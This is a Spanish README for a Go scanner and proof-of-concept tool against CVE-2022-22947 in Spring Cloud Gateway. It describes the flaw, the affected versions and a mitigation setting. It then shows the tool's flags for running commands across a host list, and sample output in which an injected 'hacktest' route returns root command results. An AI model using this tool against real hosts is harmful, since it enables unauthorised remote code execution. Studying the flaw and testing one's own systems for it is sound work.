
Escáner y PoC para CVE-2022-22947 que prueba endpoints de Actuator de Spring Cloud Gateway, inyecta filtros de ruta maliciosos y ejecuta comandos contra hosts vulnerables.
Spring Cloud Gateway es un nuevo proyecto de Spring Cloud cuyo objetivo es reemplazar a Netflix Zuul. Está desarrollado sobre Spring 5.0+, Spring Boot 2.0+ y WebFlux (basado en el framework de comunicación reactivo de alto rendimiento Netty, modelo asíncrono no bloqueante). Su rendimiento es superior al de Zuul; según pruebas oficiales, Gateway es 1.6 veces más rápido que Zuul. Su objetivo es proporcionar una forma simple y efectiva de gestión unificada de enrutamiento API para arquitecturas de microservicios.
La vulnerabilidad de ejecución remota de código en Spring Cloud Gateway (CVE-2022-22947) ocurre en los endpoints de Actuator de la aplicación Spring Cloud Gateway, que son susceptibles a inyección de código cuando están habilitados, expuestos y no asegurados. Un atacante puede explotar esta vulnerabilidad para crear solicitudes maliciosas que permitan la ejecución remota de código arbitrario en el host remoto.
Puntuación CVSS de esta vulnerabilidad: 9.8, nivel de peligro: Crítico
CVE-2022-22947
3.1.0 3.0.0 a 3.0.6 Versiones anteriores a 3.0.0
management.endpoint.gateway.enable: falseEste script está escrito en Golang y compilado para ejecutarse en Windows.
-cmd string Comando a ejecutar (default "id") -host string Dirección a detectar o ruta de archivo (default "http://127.0.0.1:80")

Ejemplo:
./cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
>cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
result: http://127.0.0.1:10089 : {"predicate":"RouteDefinitionRouteLocator$$Lambda$978/705851885","route_id":"hacktest","filters":["[[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)\n'], order = 1]"],"uri": "http://example.com:80","order":0}
vulnerable host:
http://127.0.0.1:10089